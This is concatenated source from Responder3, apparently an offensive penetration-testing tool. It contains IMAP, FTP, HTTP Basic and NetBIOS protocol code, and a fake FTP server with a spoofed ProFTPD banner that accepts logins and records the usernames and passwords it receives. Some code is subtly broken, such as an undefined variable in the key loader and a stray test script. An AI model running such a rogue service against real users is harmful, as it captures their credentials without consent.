		self.status = IMAPResponseCode.BYE
		self.params = [msg] if msg is not None else msg


class IMAPCAPABILITYResp(IMAPResponse):
	#tag optional
	#capabilities is an IMAPCapabilities object!
	def __init__(self, capabilities, tag=None):
		IMAPResponse.__init__(self, tag)
		self.status = IMAPResponseCode.CAPABILITY
		self.params = [str(capabilities)]


class IMAPCapabilities():
	def __init__(self, authMethods):
		self.authMethods  = authMethods
		self.capabilities = []

	def __str__(self):
		return ' '.join(self.capabilities) + ' ' + str(self.authMethods)

class IMAPAuthMethods():
	def __init__(self, methods = ['PLAIN']):
		self.methods = methods

	def __str__(self):
		return ' AUTH='.join(['']+self.methods).strip()
"""

IMAPRESP = {
	IMAPResponse.CAPABILITY   : IMAPCAPABILITYResp,
	IMAPResponse.BYE   : IMAPBYEResp,
	IMAPResponse.OK   : IMAPOKResp,
	IMAPResponse.BAD   : IMAPBADResp,
}


IMAPCMD = {
	IMAPCommand.CAPABILITY   : IMAPCAPABILITYCmd,
	IMAPCommand.NOOP         : IMAPNOOPCmd,
	IMAPCommand.LOGOUT       : IMAPLOGOUTCmd,
	IMAPCommand.STARTTLS     : IMAPSTARTTLSCmd,
	IMAPCommand.AUTHENTICATE : IMAPAUTHENTICATECmd,
	IMAPCommand.LOGIN        : IMAPLOGINCmd,
	IMAPCommand.SELECT       : IMAPSELECTCmd,
	IMAPCommand.EXAMINE      : IMAPEXAMINECmd,
	IMAPCommand.CREATE       : IMAPCREATECmd,
	IMAPCommand.DELETE       : IMAPDELETECmd,
	IMAPCommand.RENAME       : IMAPRENAMECmd,
	IMAPCommand.SUBSCRIBE    : IMAPSUBSCRIBECmd,
	IMAPCommand.UNSUBSCRIBE  : IMAPUNSUBSCRIBECmd,
	IMAPCommand.LIST         : IMAPLISTCmd,
	IMAPCommand.LSUB         : IMAPLSUBCmd,
	#IMAPCommand.STATUS       : IMAPSTATUSCmd,
	#IMAPCommand.APPEND       : IMAPAPPENDCmd,
	#IMAPCommand.CLIENT       : IMAPCLIENTCmd,
	#IMAPCommand.CHECK        : IMAPCHECKCmd,
	#IMAPCommand.CLOSE        : IMAPCLOSECmd,
	#IMAPCommand.EXPUNGE      : IMAPEXPUNGECmd,
	#IMAPCommand.SEARCH       : IMAPSEARCHCmd,
	#IMAPCommand.FETCH        : IMAPFETCHCmd,
	#IMAPCommand.STORE        : IMAPSTORECmd,
	#IMAPCommand.COPY         : IMAPCOPYCmd,
	#IMAPCommand.UID          : IMAPUIDCmd,
}


from responder3.core.logging.log_objects import Credential

class PlaintextCredential:
	def __init__(self, domain, username, password):
		self.domain = domain
		self.username = username
		self.password = password

	def to_credential(self):
		if self.domain:
			return Credential(
				'plaintext',
				domain = self.domain,
				username = self.username,
				password = self.password,
				fullhash = '%s:%s:%s' % (self.domain, self.username, self.password)
			)
		else:
			return Credential(
				'plaintext',
				username = self.username,
				password = self.password,
				fullhash = '%s:%s' % (self.username, self.password)
			)


from asn1crypto import keys, pem
import rsa
from rsa import pkcs1

class SSHPrivKey:
	def __init__(self, privkey = None):
		self.name = 'ssh-rsa'
		self.privkey = privkey
	
	@staticmethod
	def load_privkey_from_string(pk_str):
		"""
		Loads a PEM encoded RSA private key
		Format must be the same as /etc/ssh/ssh_host_rsa_key
		(openssl RSA private key)
		"""
		pk = SSHPrivKey()
		pk.privkey = rsa.PrivateKey.load_pkcs1(keydata,'PEM')
		return pk
		
	@staticmethod
	def load_privkey_from_file(filename):
		with open(filename, 'rb') as f:
			return SSHPrivKey.load_privkey_from_string(f.read())
		
		
	def sign(self, data):
		"""
		hashes the data with sha1 and signs the result using pkcs1.5 and SHA-1
		returns bytes
		data must be bytes!
		"""
		return pkcs1.sign(data, self.privkey, 'SHA-1')
		
		
class OpenSSLRSAPrivateKey:
	def __init__(self):
		self.p = None
		self.q = None
		self.e = None
with open('ssh_server_test_cert.priv', 'rb') as f:
	type_name, headers, der_bytes = pem.unarmor(f.read())
	object = keys.RSAPrivateKey.load(der_bytes)
	print(object['modulus'].native)
	print(object.native)
	
with open('ssh_server_test_cert.priv', 'rb') as f:
	keydata = f.read()
	privkey = rsa.PrivateKey.load_pkcs1(keydata,'PEM')
	print(privkey)
	
a = pkcs1.sign('alma'.encode(), privkey, 'SHA-1')
	
pk = SSHPrivKey.load_privkey_from_file('ssh_server_test_cert.priv')
print()
print(pk.sign('alma'.encode()))
#sig = self.key.sign(
#            data, padding=padding.PKCS1v15(), algorithm=hashes.SHA1()
#)



from setuptools import setup

with open('requirements.txt') as f:
	required = f.read().splitlines()

setup(
	# Application name:
	name="Responder3",

	# Version number (initial):
	version="0.0.1",

	# Application author details:
	author="Tamas Jos",
	author_email="responder3@skelsec.com",

	# Packages
	packages=["responder3"],

	# Include additional files into the package
	include_package_data=True,


	# Details
	url="https://github.com/skelsec/Responder3",

	zip_safe = True,
	#
	# license="LICENSE.txt",
	description="Responder3",

	# long_description=open("README.txt").read(),

	#Dependent packages (distributions)
	install_requires=required,

	python_requires='>=3.7',
	entry_points={
		'console_scripts': [
			'responder3 = responder3.__main__:main',
		],
	}
)



#https://tools.ietf.org/html/rfc959
import io
import enum
import asyncio
import traceback

from responder3.core.logging.log_objects import Credential
from responder3.core.commons import read_element
from responder3.core.asyncio_helpers import *

class FTPState(enum.Enum):
	AUTHORIZATION = enum.auto()
	AUTHENTICATED   = enum.auto()

class FTPCommand(enum.Enum):
	USER = enum.auto()
	PASS = enum.auto()
	ACCT = enum.auto()
	CWD  = enum.auto()
	CDUP = enum.auto()
	SMNT = enum.auto()
	QUIT = enum.auto()
	REIN = enum.auto()
	PORT = enum.auto()
	PASV = enum.auto()
	TYPE = enum.auto()
	STRU = enum.auto()
	MODE = enum.auto()
	RETR = enum.auto()
	STOR = enum.auto()
	STOU = enum.auto()
	APPE = enum.auto()
	ALLO = enum.auto()
	REST = enum.auto()
	RNFR = enum.auto()
	RNTO = enum.auto()
	ABOR = enum.auto()
	DELE = enum.auto()
	RMD  = enum.auto()
	MKD  = enum.auto()
	PWD  = enum.auto()
	LIST = enum.auto()
	NLST = enum.auto()
	SITE = enum.auto()
	SYST = enum.auto()
	STAT = enum.auto()
	HELP = enum.auto()
	NOOP = enum.auto()
	AUTH = enum.auto()
	NLIST= enum.auto()
	FEAT = enum.auto()
	EPSV = enum.auto()
	SIZE = enum.auto()
	XXX = enum.auto()

FTPReplyCode = {
	'110' : "Restart marker reply.",
	'120' : "Service ready in nnn minutes.",
	'125' : "Data connection already open; transfer starting.",
	'150' : "File status okay; about to open data connection.",
	'200' : "Command okay.",
	'202' : "Command not implemented, superfluous at this site.",
	'211' : "System status, or system help reply.",
	'212' : "Directory status.",
	'213' : "File status.",
	'214' : "Help message.", #On how to use the server or the meaning of a particular non-standard command.  This reply is useful only to the human user.
	'215' : "NAME system type.",  # Where NAME is an official system name from the list in the Assigned Numbers document.
	'220' : "Service ready for new user.", 
	'221' : "Service closing control connection.",   #Logged out if appropriate.
	'225' : "Data connection open; no transfer in progress.",   
	'226' : "Closing data connection.",   #Requested file action successful (for example, file transfer or file abort). 
	'227' : "Entering Passive Mode",  #(h1,h2,h3,h4,p1,p2).
	'230' : "User logged in, proceed.",  
	'250' : "Requested file action okay, completed.",  
	'257' : "\"PATHNAME\" created.",
	'331' : "User name okay, need password.",
	'332' : "Need account for login.",
	'350' : "Requested file action pending further information.", 
	'421' : "Service not available, closing control connection.", #This may be a reply to any command if the service knows it must shut down.
	'425' : "Can't open data connection.",
	'426' : "Connection closed; transfer aborted.", 
	'450' : "Requested file action not taken.", #File unavailable (e.g., file busy).
	'451' : "Requested action aborted: local error in processing.", 
	'452' : "Requested action not taken.", #Insufficient storage space in system.
	'500' : "Syntax error, command unrecognized.",  #This may include errors such as command line too long.
	'501' : "Syntax error in parameters or arguments.",
	'502' : "Command not implemented.",
	'503' : "Bad sequence of commands.", 
	'504' : "Command not implemented for that parameter.",
	'522' : "Protocol not implemented",
	'530' : "Not logged in.",
	'532' : "Need account for storing files.",
	'550' : "Requested action not taken.",  #File unavailable (e.g., file not found, no access).
	'551' : "Requested action aborted: page type unknown.", 
	'552' : "Requested file action aborted.",  #Exceeded storage allocation (for current directory or dataset).
	'553' : "Requested action not taken." #File name not allowed.
}


class FTPCommandParser:
	def __init__(self, strict = False, encoding = 'ascii'):
		self.strict      = strict
		self.encoding    = encoding

	async def from_streamreader(self, reader, timeout = 60):
		cmd = await readline_or_exc(reader, timeout=timeout)
		return self.from_bytes(cmd)

	def from_bytes(self, bbuff):
		return self.from_buffer(io.BytesIO(bbuff))

	def from_buffer(self, buff):
		line = buff.readline()
		try:
			command, *params = line.strip().decode(self.encoding).split(' ')
			if command in FTPCommand.__members__:
				return FTPCMD[FTPCommand[command]].from_bytes(line)
			else:
				return FTPXXXCmd.from_bytes(line)

		except Exception as e:
			traceback.print_exc()
			return FTPXXXCmd.from_bytes(line)


class FTPUSERCmd:
	def __init__(self, encoding = 'ascii'):
		self.encoding = encoding
		self.command  = FTPCommand.USER
		self.username = None

	@staticmethod
	def from_buffer(buff, encoding='ascii'):
		return FTPUSERCmd.from_bytes(buff.readline(), encoding)

	@staticmethod
	def from_bytes(bbuff, encoding='ascii'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = FTPUSERCmd()
		t, bbuff = read_element(bbuff)
		cmd.command = FTPCommand[t]
		cmd.username, bbuff = read_element(bbuff, toend=True)
		return cmd

	@staticmethod
	def construct(username):
		cmd = FTPUSERCmd()
		cmd.username = username
		return cmd

	def to_bytes(self):
		return ('%s %s\r\n' % (self.command.value, self.username)).encode(self.encoding)

	def __repr__(self):
		t = '== FTP %s Command ==\r\n' % self.command.name
		t += 'Command : %s\r\n' % self.command.name
		t += 'Username    : %s\r\n' % self.username
		return t


class FTPPASSCmd:
	def __init__(self, encoding = 'ascii'):
		self.encoding = encoding
		self.command  = FTPCommand.USER
		self.password = None

	@staticmethod
	def from_buffer(buff, encoding='ascii'):
		return FTPPASSCmd.from_bytes(buff.readline(), encoding)

	@staticmethod
	def from_bytes(bbuff, encoding='ascii'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = FTPPASSCmd()
		t, bbuff = read_element(bbuff)
		cmd.command = FTPCommand[t]
		cmd.password, bbuff = read_element(bbuff, toend=True)
		return cmd

	@staticmethod
	def construct(username):
		cmd = FTPPASSCmd()
		cmd.username = username
		return cmd

	def to_bytes(self):
		return ('%s %s\r\n' % (self.command.value, self.password)).encode(self.encoding)

	def __repr__(self):
		t = '== FTP %s Command ==\r\n' % self.command.name
		t += 'Command : %s\r\n' % self.command.name
		t += 'Password: %s\r\n' % self.password
		return t


class FTPXXXCmd:
	def __init__(self, encoding = 'ascii'):
		self.encoding = encoding
		self.command  = FTPCommand.XXX
		self.data = None

	@staticmethod
	def from_buffer(buff, encoding='ascii'):
		return FTPXXXCmd.from_bytes(buff.readline(), encoding)

	@staticmethod
	def from_bytes(bbuff, encoding='ascii'):
		cmd = FTPXXXCmd()
		cmd.data = bbuff.decode(encoding).strip()
		return cmd

	def to_bytes(self):
		return ('%s\r\n' % self.data).encode(self.encoding)

	def __repr__(self):
		t = '== FTP %s Command ==\r\n' % self.command.name
		t += 'DATA : %s\r\n' % self.data
		return t


class FTPReply():
	def __init__(self, code, msg = None):
		self.encoding = 'ascii'
		self.code = str(code)
		self.msg  = None
		if msg is None:
			self.msg  = [FTPReplyCode[self.code]]
		elif isinstance(msg, str):
			self.msg  = [msg]
		elif isinstance(msg, list):
			self.msg  = msg
		else:
			raise Exception('Invalid msg type')

	def to_bytes(self):
		if len(self.msg) == 1:
			return b'%s %s\r\n' % (self.code.encode(self.encoding), self.msg[0].encode(self.encoding))
		elif len(self.msg) == 2:
			temp  = b'%s-%s' % (self.code.encode(self.encoding) , self.msg[0].encode(self.encoding))
			return temp + b'%s %s' % (self.code.encode(self.encoding) , self.msg[1].encode(self.encoding))
		else:
			temp  = b'%s-%s' % (self.code.encode(self.encoding) , self.msg[0].encode(self.encoding))
			temp += b'\r\n'.join(['', (m.encode(self.encoding) for m in self.msg[1:-1] )])
			return temp + b'%s %s' % (self.code.encode(self.encoding) , self.msg[-1].encode(self.encoding))


class FTPAuthMethod(enum.Enum):
	PLAIN = enum.auto()


class FTPAuthStatus(enum.Enum):
	OK = enum.auto()
	NO = enum.auto()
	MORE_DATA_NEEDED = enum.auto()


class FTPAuthHandler:
	def __init__(self, authtype = FTPAuthMethod.PLAIN, creds=None):
		if authtype == FTPAuthMethod.PLAIN:
			self.authahndler = FTPPlainAuth(creds)
		else:
			raise NotImplementedError

	def do_AUTH(self, ftpcmd, salt = None):
		return self.authahndler.update_creds(ftpcmd)


class FTPPlainAuth:
	def __init__(self, creds):
		self.creds = creds
		self.username = None
		self.password = None

	def update_creds(self, ftpcmd):
		if ftpcmd.command == FTPCommand.USER:
			self.username = ftpcmd.username

		elif ftpcmd.command == FTPCommand.PASS:
			self.password = ftpcmd.password

		else:
			raise Exception('Wrong command for authentication!')

		if self.username is not None and self.password is not None:
			return self.verify_creds()

		else:
			return FTPAuthStatus.MORE_DATA_NEEDED, None

	def verify_creds(self):
		c = FTPPlainCred(self.username, self.password)
		if self.creds is None:
			return FTPAuthStatus.OK, c.to_credential()
		else:
			if c.username in self.creds:
				if self.creds[c.username] == c.password:
					return FTPAuthStatus.OK, c.to_credential()

			else:
				return FTPAuthStatus.NO, c.to_credential()

		return FTPAuthStatus.NO, c.to_credential()


class FTPPlainCred:
	def __init__(self, username, password):
		self.username = username
		self.password = password

	def to_credential(self):
		return Credential('PLAIN',
						  username=self.username,
						  password=self.password,
						  fullhash='%s:%s' % (self.username, self.password)
						  )

FTPCMD = {
	FTPCommand.USER: FTPUSERCmd,
	FTPCommand.PASS: FTPPASSCmd,
	#FTPCommand.QUIT: FTPQUITCmd,
}



# Work with Python 3.6
"""
Generic websocket based client-server framework
For logging it uses the Logger object and the r3exception decorators

Idea was to provide a common interface for remote communications where devs
do not need to deal with teh actual server-client comms.


Client reads a queue for !strings! and dispatches it to the server
Server waits for incoming clients, and dispatches all incoming messages to a queue as GWSSPacket

When cert-auth based SSL is set up via the SSL-CTX parameters, 
the server will yield the client's cerificate to the output queue

Current: One-way comms
The server is only capable of retrieving messages
The client is only capable of sending messages

TODO: Make it two-way comms

"""
import asyncio
import websockets
import uuid

from responder3.core.logging.logger import *
from responder3.core.logging.log_objects import *
from responder3.core.commons import *

class GWSSPacket:
	def __init__(self, client_ip, client_port, data, client_cert = None):
		self.client_ip = client_ip
		self.client_port = client_port
		self.client_cert = client_cert
		self.data = data
		
	def get_addr_s(self):
		return '%s:%d' % (self.client_ip, self.client_port)

class GenericWSPacket:
	def __init__(self, data):
		self.data = data #must be string!!!
		
	def to_dict(self):
		t = {}
		t['data'] = self.data
		return t
		
	def to_json(self):
		return json.dumps(self.to_dict())
		
	@staticmethod
	def from_dict(d):
		data = d['data']
		return GenericWSPacket(data)
		
	@staticmethod
	def from_json(raw_data):
		return GenericWSPacket.from_dict(json.loads(raw_data))

class GenericWSClient:
	def __init__(self, logQ, server_url, out_queue, ssl_ctx = None):
		self.logger = Logger('GenericWSClient', logQ = logQ)
		self.server_url = server_url
		self.ssl_ctx = ssl_ctx
		self.out_queue = out_queue
		self.shutdown_evt = asyncio.Event() #to completely shutdown the client
		self.shutdown_session_evt = asyncio.Event() #to disconnect from server, and try to connect back
		
		self.ws_ping_interval = 5
		
	@r3exception
	async def keepalive(self, ws):
		await self.logger.debug('Keepalive running!')
		while not self.shutdown_session_evt.is_set():
			try:
				pong_waiter = await ws.ping()
				await asyncio.sleep(self.ws_ping_interval)
			except websockets.exceptions.ConnectionClosed:
				await self.logger.debug('Server disconnected!')
				self.shutdown_session_evt.set()
				continue
				
			except Exception as e:
				await self.logger.exception('Unexpected error!')
				self.shutdown_session_evt.set()
				continue
	
	@r3exception
	async def run(self):
		while not self.shutdown_evt.is_set():
			try:
				self.shutdown_session_evt.clear()
				await self.logger.debug('Connecting to server...')
				async with websockets.connect(self.server_url, ssl=self.ssl_ctx) as ws:
					await self.logger.debug('Connected to server!')
					asyncio.ensure_future(self.keepalive(ws))
					while not self.shutdown_session_evt.is_set():
						try:
							#waiting to get a log from the log queue, timeout is introducted so we can check 
							#in the while loop above is the ws still exists
							str_data = await asyncio.wait_for(self.out_queue.get(), 1)
						except asyncio.TimeoutError:
							continue
						except:
							await self.logger.exception()
							
						try:
							packet = GenericWSPacket(str_data)
							await ws.send(packet.to_json())
						except Exception as e:
							self.shutdown_session_evt.set()
							raise e
						
						
				await self.logger.debug('Disconnecte from remote ws logger!')
			except Exception as e:
				await self.logger.exception()
				pass
			
			await asyncio.sleep(5)
			
class GenericWSServer:
	def __init__(self, logQ, listen_ip, listen_port, queue_in, ssl_ctx = None):
		self.logger = Logger('GenericWSServer', logQ = logQ)
		self.listen_ip = listen_ip
		self.listen_port = listen_port
		self.ssl_ctx = ssl_ctx
		self.queue_in = queue_in
		self.shutdown_evt = asyncio.Event()
		self.shutdown_session_evt = asyncio.Event()
		self.classloader = R3ClientCommsClassLoader()
		
		self.clients = {} #client_id -> Responder3ClientSession
		self.ws_ping_interval = 5
	
	@r3exception
	async def keepalive(self, ws):
		await self.logger.debug('Keepalive running!')
		while not self.shutdown_session_evt.is_set():
			try:
				pong_waiter = await ws.ping()
				await asyncio.sleep(self.ws_ping_interval)
			except websockets.exceptions.ConnectionClosed:
				await self.logger.debug('Client disconnected!')
				self.shutdown_session_evt.set()
				continue
				
			except Exception as e:
				await self.logger.exception('Unexpected error!')
				self.shutdown_session_evt.set()
				continue
	
	@r3exception
	async def client_handler(self, ws, path):
		client_ip, client_port = ws.remote_address
		################################################################################
		#!!!! If you see an error here, websockets library might have changed
		#By default the library doesnt offer high-lvel api to grab the client certificate
		#Check the new documentation of websockets if error comes in here!
		client_cert = ws.writer.get_extra_info('peercert') 
		################################################################################
		
		asyncio.ensure_future(self.keepalive(ws))
		
		client_id = str(uuid.uuid4()) #change this to ssl CN of the client!
		
		await self.logger.info('[%s] connected from %s' % (client_id, '%s:%d' % ws.remote_address))
		
		self.clients[client_id] = ws
		while not self.shutdown_session_evt.is_set():
			try:
				packet_raw = await ws.recv()
			except Exception as e:
				await self.logger.exception()
				self.shutdown_session_evt.set()
				continue
			
			packet = GenericWSPacket.from_json(packet_raw)
			gp = GWSSPacket(client_ip, client_port, packet.data, client_cert = client_cert)
			await self.queue_in.put(gp)
			
			
		del self.clients[client_id]
		await self.logger.info('[%s] disconnected' % client_id)
		
	async def run(self):
		server = await websockets.serve(self.client_handler, self.listen_ip, self.listen_port, ssl=self.ssl_ctx)
		await server.wait_closed()


import enum
import logging
import asyncio

from responder3.core.logging.logger import *
from responder3.core.asyncio_helpers import R3ConnectionClosed
from responder3.core.commons import *
from responder3.protocols.FTP import *
from responder3.core.servertemplate import ResponderServer, ResponderServerSession


class FTPSession(ResponderServerSession):
	def __init__(self, connection, log_queue):
		ResponderServerSession.__init__(self, connection, log_queue, self.__class__.__name__)
		self.encoding = 'ascii'
		self.parser = FTPCommandParser(encoding=self.encoding)
		self.authhandler = None
		self.creds = {}
		self.current_state = FTPState.AUTHORIZATION
		self.banner = None

	def __repr__(self):
		t = '== FTP Session ==\r\n'
		t += 'encoding:      %s\r\n' % repr(self.encoding)
		t += 'parser: %s\r\n' % repr(self.parser)
		t += 'current_state: %s\r\n' % repr(self.current_state)
		t += 'authhandler: %s\r\n' % repr(self.authhandler)
		return t


class FTP(ResponderServer):
	def init(self):
		if self.settings:
			self.parse_settings()
			return
		self.set_default_settings()

	def set_default_settings(self):
		self.session.banner = 'ProFTPD 1.3.5a Server (ProFTPD)'

	def parse_settings(self):
		if 'banner' in self.settings:
			self.session.banner = self.settings['banner']

	async def send_data(self, data):
		self.cwriter.write(data)
		await self.cwriter.drain()

	@r3trafficlogexception
	async def run(self):
		# send hello
		await asyncio.wait_for(
			self.send_data(FTPReply(220, self.session.banner).to_bytes()), timeout=1)
		
		# main loop
		while not self.shutdown_evt.is_set():
			try:
				result = await asyncio.gather(*[asyncio.wait_for(self.session.parser.from_streamreader(self.creader), timeout=None)], return_exceptions=True)
			except asyncio.CancelledError as e:
				raise e
			if isinstance(result[0], R3ConnectionClosed):
				return
			elif isinstance(result[0], Exception):
				raise result[0]
			else:
				cmd = result[0]

			#cmd = await asyncio.wait_for(self.parse_message(), timeout=None)
			if self.session.current_state == FTPState.AUTHORIZATION:
				if cmd.command in [FTPCommand.USER, FTPCommand.PASS, FTPCommand.QUIT]:
					if cmd.command == FTPCommand.QUIT:
						await asyncio.wait_for(
							self.send_data(FTPReply(200).to_bytes()),
							timeout=1)
						return
					else:
						if self.session.authhandler is None:
							self.session.authhandler = FTPAuthHandler(FTPAuthMethod.PLAIN, self.session.creds)
						res, cred = self.session.authhandler.do_AUTH(cmd)
						if cred is not None:
							await self.logger.credential(cred)
						if res == FTPAuthStatus.MORE_DATA_NEEDED:
							await asyncio.wait_for(
								self.send_data(FTPReply(331).to_bytes()), timeout=1)
							continue
						elif res == FTPAuthStatus.NO:
							await self.logger.credential(cred)
							await asyncio.wait_for(
								self.send_data(FTPReply(530).to_bytes()), timeout=1)
							return
						elif res == FTPAuthStatus.OK:
							await asyncio.wait_for(
								self.send_data(FTPReply(200).to_bytes()), timeout=1)
							self.session.current_state = FTPState.AUTHENTICATED
							continue
				else:
					await asyncio.wait_for(
						self.send_data(FTPReply(503).to_bytes()), timeout=1)
					return
			elif self.session.current_state == FTPState.AUTHENTICATED:
				#raise NotImplementedError
				return
			else:
				raise Exception('Unknown FTP state!')



# https://tools.ietf.org/html/rfc7617
import enum
import collections
import base64

from responder3.protocols.authentication.common import *
from responder3.protocols.authentication_providers.credential_objects import *

class BASICStatus:
	START = enum.auto()
	AUTHENTICATE = enum.auto()
	AUTHORIZE = enum.auto()
	FINISH = enum.auto()

class BASICAuthenticate:
	def __init__(self):
		self.realm  = None
		self.auth_params = []

	def to_line(self):
		data = ''
		if self.realm:
			data += 'realm=%s' % self.realm
		return data

	@staticmethod
	def from_dict(kv):
		ds = BASICAuthenticate()
		ds.realm = kv.get('realm')
		if 'auth' in kv:
			ds.auth_param = kv['auth'].split(',')
		return ds

	@staticmethod
	def from_line(self, data):
		kv = {}
		if data.find(',') != -1:
			for elem in data.split(','):
				key, value = elem.split('=')
				if value[0] == '"':
					value = value[1:-1]
				kv[key] = value
			da = BASICAuthenticate.from_dict(kv)
		return da

class BASICAuthorize:
	def __init__(self):
		self.username = None
		self.password = None

	def to_line(self):
		temp = '%s:%s' % (self.username, self.password)
		data = 'Basic %s' % base64.b64encode(temp)
		return data

	@staticmethod
	def from_dict(kv):
		ds = BASICAuthorize()
		ds.username = kv['username']
		ds.password = kv['password']
		return ds

	@staticmethod
	def from_line(data):
		temp = base64.b64decode(data.strip()).decode()
		kv = {}
		kv['username'] = temp.split(':')[0]
		kv['password'] = temp.split(':')[1]
		da = BASICAuthorize.from_dict(kv)
		return da

class BASIC:
	def __init__(self, credentials):
		self.mode = None #AUTHModuleMode SERVER or CLIENT
		self.status = BASICStatus.START
		self.credentials = credentials
		self.authenticate = None
		self.authorize = None

	def setup_defaults(self):
		self.authenticate = BASICAuthenticate()
		self.mode = AUTHModuleMode.SERVER
		return

	def setup(self, config):
		self.mode = AUTHModuleMode(config['mode'].upper())
		if self.mode == AUTHModuleMode.SERVER:
			self.authenticate = BASICAuthenticate.from_dict(config['authenticate'])
		else:
			self.authorize = BASICAuthorize.from_dict(config['authorize'])

	def verify_creds(self):
		"""
		Verifyies user creds, returns a tuple with (verification_result, credential)
		"""
		credential = PlaintextCredential(None, self.authorize.username, self.authorize.password)
		password = self.credentials.get_password('',self.authorize.username)
		if password == self.authorize.password:
			return AuthResult.OK, credential
		else:
			return AuthResult.FAIL, credential

	def do_auth(self, data = None):
		if self.mode == AUTHModuleMode.SERVER:
			if self.status == BASICStatus.START:
				if data is None:
					self.status = BASICStatus.AUTHORIZE
					#returning WWW-Authenticate data
					return AuthResult.CONTINUE, self.authenticate.to_line()
					
				else:
					self.status = BASICStatus.AUTHORIZE

			if self.status == BASICStatus.AUTHORIZE:
				if data is not None:
					#evaulation client's credentials
					self.status = BASICStatus.FINISH
					self.authorize = BASICAuthorize.from_line(data)
					return self.verify_creds()
				else:
					raise Exception('BASIC AUTH: input data expected in SERVER|AUTHORIZE state')

			else:
				raise Exception('BASIC AUTH: Unexpected SERVER state')

		elif self.mode == AUTHModuleMode.CLIENT:
			if self.status == BASICStatus.START:
				if data is not None:
					#returning WWW-Authorize data
					self.status = BASICStatus.FINISH
					self.authenticate = BASICAuthenticate.to_line()
					self.authorize = BASICAuthorize.construct(self.authenticate, credential)
					return AuthResult.OK, self.authorize.to_line()
				else:
					raise Exception('BASIC AUTH: input data expected in SERVER|AUTHORIZE state')

		else:
			raise Exception('BASIC Unknown mode')


import io
import enum
import asyncio
import ipaddress

class DNSResponseCode(enum.Enum):
	NOERR = 0 #No error condition
	FORMATERR = 1 #Format error - The name server was  unable to interpret the query.
	SERVERERR = 2 #Server failure - The name server was unable to process this query due to a problem with the name server.
	NAMEERR = 3 #Name Error - Meaningful only for responses from an authoritative name server, this code signifies that the domain name referenced in the query does not exist.
	NOTIMPL = 4 #Not Implemented - The name server does not support the requested kind of query.
	REFUSED = 5 #Refused - The name server refuses to perform the specified operation for policy reasons.
	RESERVED6 = 6
	RESERVED7 = 7
	RESERVED8 = 8
	RESERVED9 = 9
	RESERVED10 = 10
	RESERVED11 = 11
	RESERVED12 = 12
	RESERVED13 = 13
	RESERVED14 = 14
	RESERVED15 = 15

class NBQType(enum.Enum):
	NB     = 0x0020   #NetBIOS general Name Service Resource Record
	NBSTAT = 0x0021   #NetBIOS NODE STATUS Resource Record (See NODE STATUS REQUEST)

class NBQClass(enum.Enum):
	IN = 0x0001 #Internet class


class NBRType(enum.Enum):
	A      = 0x0001   #IP address Resource Record (See REDIRECT NAME QUERY RESPONSE)
	NS     = 0x0002   #Name Server Resource Record (See REDIRECT NAME QUERY RESPONSE)
	NULL   = 0x000A #NULL Resource Record (See WAIT FOR ACKNOWLEDGEMENT RESPONSE)
	NB     = 0x0020   #NetBIOS general Name Service Resource Record (See NB_FLAGS and NB_ADDRESS, below)
	NBSTAT = 0x0021 #NetBIOS NODE STATUS Resource Record (See NODE STATUS RESPONSE)

class NBRClass(enum.Enum):
	IN = 0x0001 #Internet class

class NBTSNMFlags(enum.IntFlag):
	AUTHORATIVEANSWER = 0x40 #Authoritative Answer flag. Must be zero (0) if R flag of OPCODE is zero
	TRUNCATED = 0x20 #Truncation Flag.
	RECURSIONDESIRED = 0x10 #Recursion Desired Flag.
	RECURSIONAVAILABLE = 0x8 #Recursion Available Flag.
	BROADCAST  = 0x1 #Broadcast Flag. 1: packet was broadcast or multicast  0: unicast



#http://www.rfc-editor.org/rfc/rfc1002.txt
class NBTNSOpcode(enum.Enum):
	QUERY = 0
	REGISTRATION = 5
	RELEASE =  6
	WACK = 7
	REFRESH =  8

class NBTSResponse(enum.Enum):
	REQUEST  = 0
	RESPONSE = 1

class NBTNSPacket():
	def __init__(self):
		#HEADER
		self.NAME_TRN_ID = None #Transaction ID for Name Service Transaction. Requestor places a unique value for each active  transaction.  Responder puts NAME_TRN_ID value from request packet in response packet.
		self.RESPONSE = None
		self.NM_FLAGS = None
		self.OPCPDE = None
		self.RCODE = None #Result codes of request
		self.QDCOUNT = None #Unsigned 16 bit integer specifying the number of entries in the question section of a Name
		self.ANCOUNT = None #Unsigned 16 bit integer specifying the number of resource records in the answer section of a Name Service packet.
		self.NSCOUNT = None #Unsigned 16 bit integer specifying the number of resource records in the authority section of a Name Service packet.
		self.ARCOUNT = None #Unsigned 16 bit integer specifying the number of resource records in the additional records section of a Name Service packet.

		self.Questions = []
		self.Answers   = []
		self.Authorities = []
		self.Additionals = []

	async def from_streamreader(reader):
		data = await reader.read()
		return NBTNSPacket.from_bytes(data)

	def from_bytes(bbuff):
		return NBTNSPacket.from_buffer(io.BytesIO(bbuff))

	def from_buffer(buff):
		packet = NBTNSPacket()
		packet.NAME_TRN_ID = buff.read(2)
		t = int.from_bytes(buff.read(2), byteorder = 'big', signed = False)
		packet.RESPONSE = NBTSResponse((t >> 15))
		packet.OPCODE = NBTNSOpcode((t & 0x7800) >> 11)
		packet.NM_FLAGS = NBTSNMFlags((t & 0x7F0) >> 4)
		packet.RCODE = t & 0xF
		packet.QDCOUNT = int.from_bytes(buff.read(2), byteorder = 'big', signed = False) 
		packet.ANCOUNT = int.from_bytes(buff.read(2), byteorder = 'big', signed = False) 
		packet.NSCOUNT = int.from_bytes(buff.read(2), byteorder = 'big', signed = False) 
		packet.ARCOUNT = int.from_bytes(buff.read(2), byteorder = 'big', signed = False) 

		for i in range(0, packet.QDCOUNT):
			dnsq = NBQuestion.from_buffer(buff)
			packet.Questions.append(dnsq)

		
		for i in range(0, packet.ANCOUNT):
			dnsr = NBResource.from_buffer(buff)
			packet.Answers.append(dnsr)

		for i in range(0, packet.NSCOUNT):
			dnsr = NBResource.from_buffer(buff)
			packet.Answers.append(dnsr)

		for i in range(0, packet.ARCOUNT):
			dnsr = NBResource.from_buffer(buff)
			packet.Answers.append(dnsr)

		return packet

	def construct(self, TID, response, opcode, nmflags, rcode = 0, 
					questions= [], answers= [], authorities = [], additionals = []):
		self.NAME_TRN_ID = TID
		self.RESPONSE = response
		self.OPCODE   = opcode
		self.NM_FLAGS = nmflags
		self.RCODE    = rcode
		self.QDCOUNT = len(questions)
		self.ANCOUNT = len(answers)
		self.NSCOUNT = len(authorities)
		self.ARCOUNT = len(additionals)

		self.Questions   = questions
		self.Answers     = answers
		self.Authorities = authorities
		self.Additionals = additionals

	def to_bytes(self):
		t = self.NAME_TRN_ID
		#Flags part
